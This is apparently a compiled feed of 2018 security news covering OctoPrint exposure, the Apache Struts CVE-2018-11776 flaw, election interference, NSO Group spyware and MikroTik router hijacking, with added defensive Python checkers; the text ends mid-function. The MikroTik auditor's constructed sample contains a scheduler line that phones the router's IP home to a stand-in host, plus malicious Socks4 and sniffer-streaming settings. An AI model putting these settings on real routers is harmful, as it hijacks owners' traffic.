“By changing the G-code instructions, you will instruct the device to print the object but the altered one won’t have the same physical capabilities and could be a potential danger once used,” Mertens explained. “Think about 3D-printed guns but also 3D-printed objects used in drones. Drone owners are big fans of self-printed hardware.”

3D printers have been known to catch fire and it’s not implausible that an attacker may be able to intentionally start a fire given the high temperatures during operation of the system.

Finally, an attacker could be able to spy on the vulnerable printer’s owner through the embedded webcam.

These attacks are possible not due to some serious vulnerabilities in OctoPrint, but due to the failure of users to securely configure their devices.

OctoPrint developers advise users to enable the Access Control feature and take additional steps to secure the device if remote access is required. If Access Control is disabled, anyone can remotely gain full control over the printer.

“If you plan to have your OctoPrint instance accessible over the internet, always enable Access Control and ideally don’t make it accessible to everyone over the internet but instead use a VPN or at the very least HTTP basic authentication on a layer above OctoPrint,” OctoPrint documentation reads. “A physical device that includes heaters and stepper motors really should not be publicly reachable by everyone with an internet connection, even with access control enabled.”
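Both reports above turn on two things an attacker can do with an unprotected OctoPrint instance: read G-code that encodes a design, and upload G-code altered to misbehave, including running the heaters hot. The following Python checker, added here and not part of OctoPrint or the SANS analysis, does the two things a print operator can do before a job runs: compare the file's SHA-256 against an approved digest, and flag temperature commands (M104/M109 for the hotend, M140/M190 for the bed) above ceilings assumed for a hobby FDM printer. The G-code samples are constructed for the example:

```python
import hashlib
import re
from typing import Optional

# Assumed safe ceilings for a hobby FDM printer; tune for the actual hardware.
MAX_HOTEND_C = 260.0
MAX_BED_C = 110.0

# Standard G-code temperature commands: M104/M109 hotend, M140/M190 heated bed.
TEMP_CMDS = {"M104": "hotend", "M109": "hotend", "M140": "bed", "M190": "bed"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_gcode(text: str, expected_sha256: Optional[str] = None) -> dict:
    """Flag temperature commands above the ceilings and, if an approved digest is supplied,
    any deviation from the approved file."""
    issues = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment
        if not line:
            continue
        cmd = line.split()[0].upper()
        if cmd in TEMP_CMDS:
            m = re.search(r"\bS(-?\d+(?:\.\d+)?)", line)  # S<temp> parameter
            if not m:
                continue
            temp = float(m.group(1))
            limit = MAX_HOTEND_C if TEMP_CMDS[cmd] == "hotend" else MAX_BED_C
            if temp > limit:
                issues.append(
                    f"line {lineno}: {cmd} sets {TEMP_CMDS[cmd]} to {temp:g} C, limit {limit:g} C"
                )
    digest = sha256_hex(text.encode("utf-8"))
    if expected_sha256 is not None and digest != expected_sha256.lower():
        issues.append("sha256 mismatch: file differs from the approved version")
    return {"sha256": digest, "issues": issues}


# Constructed samples: the approved job and a copy with the hotend pushed to 300 C.
APPROVED_GCODE = """; bracket v3, sliced 2018-09-04
M140 S60   ; bed
M104 S210  ; hotend
M190 S60
M109 S210
G28        ; home
G1 X10 Y10 Z0.2 F1500
G1 X50 Y10 E2.5 F1200
M104 S0
M140 S0
"""
TAMPERED_GCODE = APPROVED_GCODE.replace("M104 S210  ; hotend", "M104 S300  ; hotend")
```

The digest catches any byte that changed; the temperature scan catches the specific hazard the experts describe even when no approved copy exists. Neither replaces the OctoPrint advice: enable Access Control and keep the instance off the public internet.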

Google Fights Tech Support Scams With New Ad Restrictions
4.9.2018 securityweek 

Google announced late last week that it’s preparing a new verification program designed to keep tech support scams off its advertising platform.

Tech support scams still represent a major issue and while these types of schemes are often unsophisticated, fraudsters have been known to use some creative methods to achieve their goals.

Tech support scammers can lure their victims through online ads, and Google’s advertising platform has been increasingly abused for this purpose. That is why the tech giant has decided to introduce some restrictions for tech support services.

“We’ve seen a rise in misleading ad experiences stemming from third-party technical support providers and have decided to begin restricting ads in this category globally,” said David Graff, director of Global Product Policy at Google.

“As the fraudulent activity takes place off our platform, it’s increasingly difficult to separate the bad actors from the legitimate providers. That’s why in the coming months, we will roll out a verification program to ensure that only legitimate providers of third-party tech support can use our platform to reach consumers,” Graff explained.

While Google is aware that the introduction of the new verification program will not block all attempts to “game” its advertising systems, the company is confident that it will at least make it “a lot harder.”

Google previously banned ads for bail bonds services and payday loans, and introduced verification programs for locksmith services and addiction treatment centers.

The company said it had paid out $12.6 billion to publishing partners in its ad network last year. On the other hand, it removed 320,000 publishers, and blacklisted roughly 90,000 websites and 700,000 mobile applications.

Google also said it took down 3.2 billion ads that violated its policies in 2017, which represents roughly 100 bad ads per second.

“We blocked 79 million ads in our network for attempting to send people to malware-laden sites, and removed 400,000 of these unsafe sites last year. And, we removed 66 million ‘trick-to-click’ ads as well as 48 million ads that were attempting to get users to install unwanted software,” the company said in its report for 2017.

Oracle Products Affected by Exploited Apache Struts Flaw
4.9.2018 securityweek 

Oracle informed customers over the weekend that some of the company’s products are affected by a critical Apache Struts 2 vulnerability that has been exploited in the wild.

The vulnerability, discovered in the open source development framework by Semmle researcher Man Yue Mo, is tracked as CVE-2018-11776 and it has been classified as critical. It allows an unauthenticated attacker to remotely execute arbitrary code on a targeted server by sending it a specially crafted request.

The existence of the flaw was disclosed on August 22, and despite the availability of only limited technical information, proof-of-concept (PoC) exploits emerged within days.

On around August 27, security firms started seeing attempts to find vulnerable Apache Struts 2 installations, and even attempts to exploit the security hole to deliver a cryptocurrency miner.

Oracle notified customers of CVE-2018-11776 on Saturday and warned that Apache Struts 2 is a component of several of its product distributions. However, the company noted that not all products incorporating Struts 2 are necessarily vulnerable.

“When the alwaysSelectFullNamespace option is enabled in a Struts 2 configuration file, and an ACTION tag is specified without a namespace attribute or a wildcard namespace, this vulnerability can be used to perform an unauthenticated remote code execution attack which can lead to a complete compromise of the targeted system,” Oracle said in its advisory.
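Oracle's description identifies a configuration pattern rather than a version, so a deployment can be triaged from its struts.xml. The Python scanner below is an added example, not Oracle or Apache tooling: it reports whether alwaysSelectFullNamespace is enabled (as a constant in struts.xml or, as a fallback, in a struts.properties mapping the caller passes in) and whether any package or redirectAction result lacks a namespace or uses a wildcard one. The two configurations are constructed for the example:

```python
import xml.etree.ElementTree as ET
from typing import Dict, Optional

CONSTANT = "struts.mapper.alwaysSelectFullNamespace"


def _is_true(value: Optional[str]) -> bool:
    return (value or "").strip().lower() == "true"


def _missing_or_wildcard(ns: Optional[str]) -> bool:
    return ns is None or ns.strip() == "" or "*" in ns


def scan_struts_config(struts_xml: str, struts_properties: Optional[Dict[str, str]] = None) -> dict:
    """Heuristic for the pattern in Oracle's advisory: the constant is true and a package has
    no namespace or a wildcard one, or a redirectAction result omits its namespace param."""
    root = ET.fromstring(struts_xml)
    # struts.properties may set the constant; a <constant> element in struts.xml overrides it.
    enabled = _is_true((struts_properties or {}).get(CONSTANT))
    for c in root.iter("constant"):
        if c.get("name") == CONSTANT:
            enabled = _is_true(c.get("value"))
    risky = []
    for pkg in root.iter("package"):
        if _missing_or_wildcard(pkg.get("namespace")):
            risky.append(f"package '{pkg.get('name')}' namespace={pkg.get('namespace')!r}")
    for action in root.iter("action"):
        for res in action.findall("result"):
            if res.get("type") != "redirectAction":
                continue
            params = {p.get("name"): (p.text or "").strip() for p in res.findall("param")}
            if _missing_or_wildcard(params.get("namespace")):
                risky.append(f"action '{action.get('name')}' has a redirectAction result without a namespace")
    return {
        "always_select_full_namespace": enabled,
        "risky": risky,
        "matches_advisory_pattern": enabled and bool(risky),
    }


# Constructed configuration exhibiting the pattern: constant on, package without a namespace,
# and a redirectAction result that names only the action.
VULNERABLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.5//EN"
    "http://struts.apache.org/dtds/struts-2.5.dtd">
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="help" class="com.example.HelpAction">
      <result type="redirectAction">
        <param name="actionName">index</param>
      </result>
    </action>
  </package>
</struts>
"""

# Same configuration with the constant off and explicit namespaces everywhere.
HARDENED_XML = (
    VULNERABLE_XML.replace('value="true"', 'value="false"')
    .replace('<package name="default" extends="struts-default">',
             '<package name="default" namespace="/app" extends="struts-default">')
    .replace('<param name="actionName">index</param>',
             '<param name="actionName">index</param>\n        <param name="namespace">/app</param>')
)
```

A match means the deployment is exposed if its Struts jars are unpatched; a non-match only narrows the exposure, because the bug is in the framework and the fix is the upstream release (Struts 2.3.35 or 2.5.17) rather than a configuration edit.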

The exact list of products impacted by the vulnerability is only available to Oracle customers, but the company revealed last year – when it warned users about another actively exploited Struts 2 flaw – that the framework is used in MySQL Enterprise Monitor, Communications Policy Management, FLEXCUBE Private Banking, Retail XBRi, Siebel, WebLogic Server, and various Financial Services and Insurance products.

Customers have been provided information on the status of each impacted product and the availability of patches. Oracle’s next Critical Patch Update (CPU) is scheduled for October 16.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.

Twitter to Verify Those Behind Hot-button US Issue Ads
4.9.2018 securityweek 

Twitter on Thursday started requiring those behind hot-button issue ads in the US to be vetted as part of the effort by the social network to thwart stealth campaigns aimed at influencing politics.

The tightened ad policy included requiring photos and valid contact information, and prohibited state-owned media or national authorities from buying political ads to be shown on Twitter outside their home countries.

Those placing these Twitter ads will need to be "certified" by the company and meet certain guidelines, and the ads will be labeled as political "issue" messages.

"The intention of this policy is to provide the public with greater transparency into ads that seek to influence people's stance on issues that may influence election outcomes," Twitter executives Del Harvey and Bruce Falck said in a blog post.

The new ad policy came as major technology firms including Facebook, Google and Twitter battle against misinformation campaigns by foreign agents.

Facebook, Twitter, Google and Microsoft recently blocked accounts from Russian and Iranian entities which the companies said were propagating misinformation aimed at disrupting the November US elections.

The new ad policy at Twitter applies to paid messages that identify political candidates or advocate regarding legislative issues of national importance.

Examples of issue topics provided by Twitter included abortion, civil rights, climate change, guns, healthcare, immigration, national security, social security, taxes and trade.

The policy did not apply to news agencies reporting on candidates or issues, rather than advocating outcomes, according to Harvey and Falck.

Silicon Valley executives are set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.

Will Russian Hackers Affect This Year's US Election?
4.9.2018 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the others have not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to TrendMicro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell, an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institutes of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable, said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes, said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."

Lawsuit Lays Bare Israel-made Hack Tools in Mideast, Mexico
4.9.2018 securityweek  CyberSpy

PARIS (AP) — One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.

A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel's NSO Group. He told The Associated Press he considered the phone compromised.

"I feared that someone could get back into it," he said in an interview Friday. "I needed to protect my sources."

Al-Athbah, who edits Qatar's Al-Arab newspaper, now has a new phone, a new SIM card and a new approach to email attachments and links. He says he never opens anything, "even from the most trusted circles in my life."

Al-Athbah's discovery touched off a process that has led, months later, to parallel lawsuits filed in Israel and Cyprus — and provided a behind-the-scenes look at how government-grade spyware is used to eavesdrop on everyone from Mexican reporters to Arab royalty.

The NSO Group did not immediately return messages seeking comment.

The first lawsuit, filed in a Tel Aviv court on Thursday, carries a claim from five Mexican journalists and activists who allege they were spied on using NSO Group software. The second, filed in Cyprus, adds Al-Athbah to the list of plaintiffs.

Both draw heavily on the leaked material handed to the editor several months ago. Portions of the material — which appears to have been carefully picked and exhaustively annotated by an unknown party — appear to show officials in the United Arab Emirates discussing whether to hack into the phones of senior figures in Saudi Arabia and Qatar, including members of the Qatari royal family.

Al-Athbah declined to identify his source and the AP was not immediately able to verify the authenticity of the material, some of which has already been entered into evidence in the Israeli case, according to Mazen Masri, a member of Al-Athbah's legal team. But The New York Times, which first reported on the lawsuits earlier Friday, indicated that it had verified some of the cache, including a reference to an intercepted telephone conversation involving senior Arab journalist Abdulaziz Alkhamis. The Times said Alkhamis confirmed having had the conversation and said he was unaware that he was under surveillance.

The parallel lawsuits underline the growing notoriety of the NSO Group, which is owned by U.S. private equity firm Francisco Partners.

One of the Mexican plaintiffs, childhood anti-obesity campaigner Alejandro Calvillo, drew global attention last year when he was revealed to have been targeted using the Israeli company's spyware. The NSO Group's programs have since been implicated in a massive espionage scandal in Panama. A month ago, respected human rights organization Amnesty International accused the company of having crafted the digital tools used to target one of its staffers.

The five Mexican plaintiffs, who were advised by Mexico City-based digital activism group widely known by its acronym R3D, are seeking 2.5 million Israeli shekels ($693,000) in compensation and an injunction to prevent the NSO Group from helping anyone spy on them.

Al-Athbah said he wanted the case to go even further and spawn restrictions on the trade in hacking tools.

"I hope selling such technology should be stopped very soon," he said.

The Continuing Problem of Aligning Cybersecurity With Business
4.9.2018 securityweek  Cyber

Aligning security policy with business practices is generally considered to be a key imperative for a successful company. This must necessarily start with security teams understanding the business, and business leaders understanding security requirements.

Varonis decided to test the progress by querying 345 C-Suite executives and IT/cybersecurity professionals -- broadly separated into business and IT/security groups -- across the U.S., UK, France and Germany. The results show apparent progress, but with puzzling details that might indicate slightly divergent viewpoints between the two groups.

For example, asked what types of data most need to be protected, both groups agreed on first customer or patient data, and second, intellectual property. They disagreed however, on the third priority. The business group specified employee data, while the security group specified financial data.

However, the most surprising divergence comes in the response to a query on the business impact of a data breach. The security group were most concerned about loss of brand image for the business, while the business group were most concerned with the cost of recovery.

"If I had been asked before the survey," Brian Vecci, technical evangelist at Varonis, told SecurityWeek, "I would have thought that non-IT folks would have been more concerned about brand image and damage than with IT recovery costs -- but it's actually the other way around. It's the security experts that are most concerned with brand perception and intellectual property loss, whereas the non-IT C-suite execs -- the top business leaders -- tend to think that IT recovery costs are the biggest issues."

The figures suggest that business and IT/sec are still not fully aligned, but in a non-intuitive manner. The reason could be something simple. Business leaders understand business better than they understand cybersecurity, and consequently worry more about what they don't fully understand; while IT/sec people understand security better than they understand commerce.

Or it could be a continuing failure for IT/sec to find the best metrics for reporting to business leaders. "It's all about data," said Vecci. "Nobody ever breaks into a network to steal the network log -- it's all about data, either exfiltrating and stealing data, or in denying service with something like ransomware."

IT/sec is aware of the scale of the data issue, while business leaders are only just becoming aware. "We're living in a more dangerous interconnected world, where anybody, anywhere can -- and if they want to, probably will -- get into your network," continued Vecci. "And the scale of the problems they have to solve when it comes to data is far bigger than it used to be. Most companies have between 30% and 50% more data this year than they had last year, and it's not slowing down -- it's just the way things work."

The data that needs to be secured is also changing in its nature. A few years ago, most sensitive data was stored in structured databases, and the need and methodologies for securing that data were well understood. Now, however, the majority of sensitive data -- made more sensitive by increasingly stringent data privacy laws like the GDPR -- is held in unstructured files and documents. Earlier this year, the 2018 Varonis Global Data Risk Report showed that 41% of companies have more than 1,000 sensitive files open to everyone with access to the network, 58% of companies have more than 100,000 folders open to everyone.

IT and security teams need increasing budgets to solve the increasing problems -- so their reporting tends to reflect the problems. They, however, are less concerned because they can see the improvements to their security posture; and the Varonis figures confirm this. Ninety-one percent of the IT/sec group believe their organization is making progress in security, while only 69% of the business leaders see that progress.

"The arrival of machine learning technologies has helped CISOs believe they are moving the needle and improving security," suggests Vecci. "They can see this, while business execs, who tend to have a more binary view of things, possibly cannot see it."

The misalignment between IT/sec and business leaders may, then, be down to the difficulty of delivering meaningful metrics on the effect of machine learning defenses. This is possibly confirmed by one of the responses in the Varonis survey. Asked whether the organization can quantify the effect of cybersecurity measures, 88% of the IT/sec group replied in the affirmative, while only 68% of the business group agreed.

Unfortunately, while this may be partially true, other figures from the Varonis survey suggest that there remains a fundamental divide between the two sides. Ninety-six per cent of the IT/sec group believes their security planning approach is aligned with the organization's risks and objectives, but only 73% of the business leaders agree.

Perhaps the most concerning response came from the question on whether business is actually listening to IT/sec. Asked whether the leadership acts on input/guidance from the IT/sec team, 94% of the IT/sec team agreed, while only 76% of the business group agreed.

This Varonis survey shows that a fundamental misalignment still exists between business and IT/sec -- but not always in the most obvious manner. It could possibly be because business leaders still do not understand cybersecurity and simply turn a deaf ear to demands for more budget; or it could be the continuing inability of the IT/sec team to find the right metrics that can be understood by business people. This could in turn be down to the speed of technological changes. IT/sec is introducing new technologies like machine learning at a faster rate than they can provide metrics on the performance of those technologies.

Experts warn of 7,500+ MikroTik Routers that are hijacking owners’ traffic
4.9.2018 securityaffairs Hacking

The security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously
Earlier August, experts uncovered a massive crypto jacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.

The campaign started in Brazil, but it rapidly expanded to other countries, targeting MikroTik routers all over the world; over 200,000 devices were compromised.

Now experts from the security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously, allowing attackers to hijack the traffic of the hacked devices.

“What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.” reads the analysis published by Qihoo 360 Netlab.

“More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.”

According to the researchers, since mid-July the hackers have been exploiting the CVE-2018-14847 vulnerability in MikroTik routers to carry out the attacks.

The CVE-2018-14847 flaw was first revealed by WikiLeaks as part of the CIA Vault7 dump, the code for the exploitation of the issue was included in the hacking tool Chimay Red.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

Communication ports associated with the Winbox and Webfig are TCP/8291, TCP/80, and TCP/8080.

The researchers scanned the Internet for vulnerable devices and found more than 5,000K devices with the TCP/8291 port open; 1,200K of them are MikroTik devices, of which 370K (30.83%) are vulnerable to CVE-2018-14847.

Summarizing, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit because owners have not updated them.

Most of the vulnerable devices are located in Brazil, Russia, and Indonesia.

Mikrotik routers vulnerable

Netlab experts have detected a malware exploiting the CVE-2018-14847 vulnerability in the Mikrotik routers to perform a broad range of malicious activities, including traffic hijacking and CoinHive mining code injection.

The analysis shared by the experts includes the attack scenarios.

CoinHive Mining Code Injection
After enabling the MikroTik RouterOS HTTP proxy, the attackers redirect HTTP proxy requests to a local HTTP 403 error page that injects a link to Coinhive's web mining code. However, the mining code delivered this way cannot work, because all external web resources, including ones, are blocked by the proxy ACLs set by the attackers themselves.

Maliciously Enabling Sock4 Proxy
The attackers enabled the Socks4 proxy, mostly on TCP/4153, on victims' devices; the attacker keeps control of the router even after it has been rebooted (and its IP address has changed) because the device periodically reports its latest IP address to the attacker's URL.

“a total of 239K IPs are confirmed to have Socks4 proxy enabled maliciously. The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block” states the report

“In order for the attacker to gain control even after device reboot(ip change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL.”

Experts pointed out that all the 239,000 IP addresses only allow access from, actually mainly from the address.

MikroTik RouterOS devices can capture packets on the router and forward them to a specified stream server; this feature could be abused by attackers to forward the traffic to IP addresses under their control. Experts noticed that a significant number of devices have their traffic going to the IP.

Don’t waste time, update the MikroTik devices and also check if the HTTP proxy, Socks4 proxy, and network traffic capture function are being abused by attackers.
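To check a router for the three abuses the article lists (HTTP proxy, Socks4 proxy, traffic capture), here is an added example, not code from Netlab or from this article, that audits a RouterOS `/export` dump for those indicators. The export text, the task name and the addresses in it are constructed for the example (198.51.100.0/24 and 203.0.113.0/24 are documentation ranges, not attacker infrastructure).

```python
"""Audit a MikroTik RouterOS '/export' dump for the abuse indicators described
above: a maliciously enabled Socks4 proxy (TCP/4153 in the campaign), an HTTP
proxy with deny ACLs (error-page injection), packet-sniffer streaming to an
external server, and a scheduler task that phones home with the router's IP.
The export below is constructed for this example; the addresses are
documentation ranges, not real attacker infrastructure.
"""
import re
from typing import Dict, List

Entry = Dict[str, str]

# Constructed sample export resembling '/export compact' output.
SAMPLE_EXPORT = """\
# sep/04/2018 10:00:00 by RouterOS 6.40.5
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny dst-host=* path=*
/ip socks
set enabled=yes port=4153
/ip socks access
add action=allow src-address=198.51.100.0/24
add action=deny
/tool sniffer
set filter-ip-protocol=tcp streaming-enabled=yes streaming-server=203.0.113.7
/system scheduler
add interval=10m name=upd on-event="/tool fetch url=http://203.0.113.7/report.php?ip=[/ip address get 0 address]" policy=read,write
"""

# key=value where the value is either a double-quoted string or a bare token
_KV_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text: str) -> Dict[str, List[Entry]]:
    """Map each menu path (e.g. '/ip socks') to its 'set'/'add' lines as dicts."""
    sections: Dict[str, List[Entry]] = {}
    current = None
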